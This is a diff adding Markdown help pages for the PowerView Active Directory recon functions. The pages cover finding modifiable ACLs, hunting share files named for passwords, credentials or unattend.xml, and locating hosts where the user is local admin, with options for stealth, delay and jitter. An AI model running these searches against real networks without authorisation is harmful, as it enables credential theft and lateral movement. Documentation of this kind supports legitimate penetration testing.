+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain and target systems.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -StopOnSuccess
+Switch.
+Stop hunting after finding after finding a target user.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Delay
+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Jitter
+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
+
+```yaml
+Type: Double
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0.3
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ShowAll
+Switch.
+Return all user location results instead of filtering based on target
+specifications.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ShowAll
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Stealth
+Switch.
+Only enumerate sessions from connonly used target servers.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -StealthSource
+The source of target servers to use, 'DFS' (distributed file servers),
+'DC' (domain controllers), 'File' (file servers), or 'All' (the default).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: All
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Threads
+The number of threads to use for user searching, defaults to 20.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 20
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.UserLocation
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Find-InterestingDomainAcl.md b/docs/Recon/Find-InterestingDomainAcl.md new file mode 100755 index 0000000..eeda73a --- /dev/null +++ b/docs/Recon/Find-InterestingDomainAcl.md @@ -0,0 +1,239 @@ +# Find-InterestingDomainAcl
+
+## SYNOPSIS
+Finds object ACLs in the current (or specified) domain with modification
+rights set to non-built in objects.
+
+Thanks Sean Metcalf (@pyrotek3) for the idea and guidance.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainObjectAcl, Get-DomainObject, Convert-ADName
+
+## SYNTAX
+
+```
+Find-InterestingDomainAcl [[-Domain] <String>] [-ResolveGUIDs] [-RightsFilter <String>] [-LDAPFilter <String>]
+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function enumerates the ACLs for every object in the domain with Get-DomainObjectAcl,
+and for each returned ACE entry it checks if principal security identifier
+is *-1000 (meaning the account is not built in), and also checks if the rights for
+the ACE mean the object can be modified by the principal.
+If these conditions are met,
+then the security identifier SID is translated, the domain object is retrieved, and
+additional IdentityReference* information is appended to the output object.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Find-InterestingDomainAcl
+```
+
+Finds interesting object ACLS in the current domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Find-InterestingDomainAcl -Domain dev.testlab.local -ResolveGUIDs
+```
+
+Finds interesting object ACLS in the ev.testlab.local domain and
+resolves rights GUIDs to display names.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Find-InterestingDomainAcl -Credential $Cred -ResolveGUIDs
+
+## PARAMETERS
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainName, Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -ResolveGUIDs
+Switch.
+Resolve GUIDs to their display names.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -RightsFilter
+{{Fill RightsFilter Description}}
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.ACL
+
+Custom PSObject with ACL entries.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Find-InterestingDomainShareFile.md b/docs/Recon/Find-InterestingDomainShareFile.md new file mode 100755 index 0000000..511510f --- /dev/null +++ b/docs/Recon/Find-InterestingDomainShareFile.md @@ -0,0 +1,463 @@ +# Find-InterestingDomainShareFile
+
+## SYNOPSIS
+Searches for files matching specific criteria on readable shares
+in the domain.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetShare, Find-InterestingFile, New-ThreadedFunction
+
+## SYNTAX
+
+### FileSpecification (Default)
+```
+Find-InterestingDomainShareFile [[-ComputerName] <String[]>] [-ComputerDomain <String>]
+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerOperatingSystem <String>]
+ [-ComputerServicePack <String>] [-ComputerSiteName <String>] [-Include <String[]>] [-SharePath <String[]>]
+ [-ExcludedShares <String[]>] [-LastAccessTime <DateTime>] [-LastWriteTime <DateTime>]
+ [-CreationTime <DateTime>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>] [-Delay <Int32>] [-Jitter <Double>]
+ [-Threads <Int32>]
+```
+
+### OfficeDocs
+```
+Find-InterestingDomainShareFile [[-ComputerName] <String[]>] [-ComputerDomain <String>]
+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerOperatingSystem <String>]
+ [-ComputerServicePack <String>] [-ComputerSiteName <String>] [-SharePath <String[]>]
+ [-ExcludedShares <String[]>] [-OfficeDocs] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+ [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]
+```
+
+### FreshEXEs
+```
+Find-InterestingDomainShareFile [[-ComputerName] <String[]>] [-ComputerDomain <String>]
+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerOperatingSystem <String>]
+ [-ComputerServicePack <String>] [-ComputerSiteName <String>] [-SharePath <String[]>]
+ [-ExcludedShares <String[]>] [-FreshEXEs] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>] [-Delay <Int32>] [-Jitter <Double>]
+ [-Threads <Int32>]
+```
+
+## DESCRIPTION
+This function enumerates all machines on the current (or specified) domain
+using Get-DomainComputer, and enumerates the available shares for each
+machine with Get-NetShare.
+It will then use Find-InterestingFile on each
+readhable share, searching for files marching specific criteria.
+If -Credential
+is passed, then Invoke-UserImpersonation is used to impersonate the specified
+user before enumeration, reverting after with Invoke-RevertToSelf.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Find-InterestingDomainShareFile
+```
+
+Finds 'interesting' files on the current domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Find-InterestingDomainShareFile -ComputerName @('windows1.testlab.local','windows2.testlab.local')
+```
+
+Finds 'interesting' files on readable shares on the specified systems.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('DEV\dfm.a', $SecPassword)
+Find-DomainShare -Domain testlab.local -Credential $Cred
+
+Searches interesting files in the testlab.local domain using the specified alternate credentials.
+
+## PARAMETERS
+
+### -ComputerName
+Specifies an array of one or more hosts to enumerate, passable on the pipeline.
+If -ComputerName is not passed, the default behavior is to enumerate all machines
+in the domain returned by Get-DomainComputer.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DNSHostName
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -ComputerDomain
+Specifies the domain to query for computers, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerLDAPFilter
+Specifies an LDAP query string that is used to search for computer objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerSearchBase
+Specifies the LDAP source to search through for computers,
+e.g.
+"LDAP://OU=secret,DC=testlab,DC=local".
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerOperatingSystem
+Search computers with a specific operating system, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: OperatingSystem
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerServicePack
+Search computers with a specific service pack, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ServicePack
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerSiteName
+Search computers in the specific AD Site name, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: SiteName
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Include
+Only return files/folders that match the specified array of strings,
+i.e.
+@(*.doc*, *.xls*, *.ppt*)
+
+```yaml
+Type: String[]
+Parameter Sets: FileSpecification
+Aliases: SearchTerms, Terms
+
+Required: False
+Position: Named
+Default value: @('*password*', '*sensitive*', '*admin*', '*login*', '*secret*', 'unattend*.xml', '*.vmdk', '*creds*', '*credential*', '*.config')
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SharePath
+Specifies one or more specific share paths to search, in the form \\\\COMPUTER\Share
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: Share
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ExcludedShares
+Specifies share paths to exclude, default of C$, Admin$, Print$, IPC$.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: @('C$', 'Admin$', 'Print$', 'IPC$')
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LastAccessTime
+Only return files with a LastAccessTime greater than this date value.
+
+```yaml
+Type: DateTime
+Parameter Sets: FileSpecification
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LastWriteTime
+Only return files with a LastWriteTime greater than this date value.
+
+```yaml
+Type: DateTime
+Parameter Sets: FileSpecification
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -CreationTime
+Only return files with a CreationTime greater than this date value.
+
+```yaml
+Type: DateTime
+Parameter Sets: FileSpecification
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -OfficeDocs
+Switch.
+Search for office documents (*.doc*, *.xls*, *.ppt*)
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: OfficeDocs
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FreshEXEs
+Switch.
+Find .EXEs accessed within the last 7 days.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: FreshEXEs
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain and target systems.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Delay
+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Jitter
+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
+
+```yaml
+Type: Double
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0.3
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Threads
+The number of threads to use for user searching, defaults to 20.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 20
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.FoundFile
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Find-InterestingFile.md b/docs/Recon/Find-InterestingFile.md new file mode 100755 index 0000000..2fe6abf --- /dev/null +++ b/docs/Recon/Find-InterestingFile.md @@ -0,0 +1,248 @@ +# Find-InterestingFile
+
+## SYNOPSIS
+Searches for files on the given path that match a series of specified criteria.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection
+
+## SYNTAX
+
+### FileSpecification (Default)
+```
+Find-InterestingFile [[-Path] <String[]>] [-Include <String[]>] [-LastAccessTime <DateTime>]
+ [-LastWriteTime <DateTime>] [-CreationTime <DateTime>] [-ExcludeFolders] [-ExcludeHidden] [-CheckWriteAccess]
+ [-Credential <PSCredential>]
+```
+
+### OfficeDocs
+```
+Find-InterestingFile [[-Path] <String[]>] [-OfficeDocs] [-CheckWriteAccess] [-Credential <PSCredential>]
+```
+
+### FreshEXEs
+```
+Find-InterestingFile [[-Path] <String[]>] [-FreshEXEs] [-CheckWriteAccess] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function recursively searches a given UNC path for files with
+specific keywords in the name (default of pass, sensitive, secret, admin,
+login and unattend*.xml).
+By default, hidden files/folders are included
+in search results.
+If -Credential is passed, Add-RemoteConnection/Remove-RemoteConnection
+is used to temporarily map the remote share.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Find-InterestingFile -Path "C:\Backup\"
+```
+
+Returns any files on the local path C:\Backup\ that have the default
+search term set in the title.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Find-InterestingFile -Path "\\WINDOWS7\Users\" -LastAccessTime (Get-Date).AddDays(-7)
+```
+
+Returns any files on the remote path \\\\WINDOWS7\Users\ that have the default
+search term set in the title and were accessed within the last week.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Find-InterestingFile -Credential $Cred -Path "\\\\PRIMARY.testlab.local\C$\Temp\"
+
+## PARAMETERS
+
+### -Path
+UNC/local path to recursively search.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 1
+Default value: .\
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Include
+Only return files/folders that match the specified array of strings,
+i.e.
+@(*.doc*, *.xls*, *.ppt*)
+
+```yaml
+Type: String[]
+Parameter Sets: FileSpecification
+Aliases: SearchTerms, Terms
+
+Required: False
+Position: Named
+Default value: @('*password*', '*sensitive*', '*admin*', '*login*', '*secret*', 'unattend*.xml', '*.vmdk', '*creds*', '*credential*', '*.config')
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LastAccessTime
+Only return files with a LastAccessTime greater than this date value.
+
+```yaml
+Type: DateTime
+Parameter Sets: FileSpecification
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LastWriteTime
+Only return files with a LastWriteTime greater than this date value.
+
+```yaml
+Type: DateTime
+Parameter Sets: FileSpecification
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -CreationTime
+Only return files with a CreationTime greater than this date value.
+
+```yaml
+Type: DateTime
+Parameter Sets: FileSpecification
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -OfficeDocs
+Switch.
+Search for office documents (*.doc*, *.xls*, *.ppt*)
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: OfficeDocs
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FreshEXEs
+Switch.
+Find .EXEs accessed within the last 7 days.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: FreshEXEs
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ExcludeFolders
+Switch.
+Exclude folders from the search results.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: FileSpecification
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ExcludeHidden
+Switch.
+Exclude hidden files and folders from the search results.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: FileSpecification
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -CheckWriteAccess
+Switch.
+Only returns files the current user has write access to.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+to connect to remote systems for file enumeration.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.FoundFile
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Find-LocalAdminAccess.md b/docs/Recon/Find-LocalAdminAccess.md new file mode 100755 index 0000000..f3e3b6f --- /dev/null +++ b/docs/Recon/Find-LocalAdminAccess.md @@ -0,0 +1,337 @@ +# Find-LocalAdminAccess
+
+## SYNOPSIS
+Finds machines on the local domain where the current user has local administrator access.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Test-AdminAccess, New-ThreadedFunction
+
+## SYNTAX
+
+```
+Find-LocalAdminAccess [[-ComputerName] <String[]>] [-ComputerDomain <String>] [-ComputerLDAPFilter <String>]
+ [-ComputerSearchBase <String>] [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>]
+ [-ComputerSiteName <String>] [-CheckShareAccess] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+ [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]
+```
+
+## DESCRIPTION
+This function enumerates all machines on the current (or specified) domain
+using Get-DomainComputer, and for each computer it checks if the current user
+has local administrator access using Test-AdminAccess.
+If -Credential is passed,
+then Invoke-UserImpersonation is used to impersonate the specified user
+before enumeration, reverting after with Invoke-RevertToSelf.
+
+Idea adapted from the local_admin_search_enum post module in Metasploit written by:
+ 'Brandon McCann "zeknox" \<bmccann\[at\]accuvant.com\>'
+ 'Thomas McCarthy "smilingraccoon" \<smilingraccoon\[at\]gmail.com\>'
+ 'Royce Davis "r3dy" \<rdavis\[at\]accuvant.com\>'
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Find-LocalAdminAccess
+```
+
+Finds machines in the current domain the current user has admin access to.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Find-LocalAdminAccess -Domain dev.testlab.local
+```
+
+Finds machines in the dev.testlab.local domain the current user has admin access to.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Find-LocalAdminAccess -Domain testlab.local -Credential $Cred
+
+Finds machines in the testlab.local domain that the user with the specified -Credential
+has admin access to.
+
+## PARAMETERS
+
+### -ComputerName
+Specifies an array of one or more hosts to enumerate, passable on the pipeline.
+If -ComputerName is not passed, the default behavior is to enumerate all machines
+in the domain returned by Get-DomainComputer.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DNSHostName
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -ComputerDomain
+Specifies the domain to query for computers, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerLDAPFilter
+Specifies an LDAP query string that is used to search for computer objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerSearchBase
+Specifies the LDAP source to search through for computers,
+e.g.
+"LDAP://OU=secret,DC=testlab,DC=local".
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerOperatingSystem
+Search computers with a specific operating system, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: OperatingSystem
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerServicePack
+Search computers with a specific service pack, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ServicePack
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerSiteName
+Search computers in the specific AD Site name, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: SiteName
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -CheckShareAccess
+Switch.
+Only display found shares that the local user has access to.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain and target systems.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Delay
+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
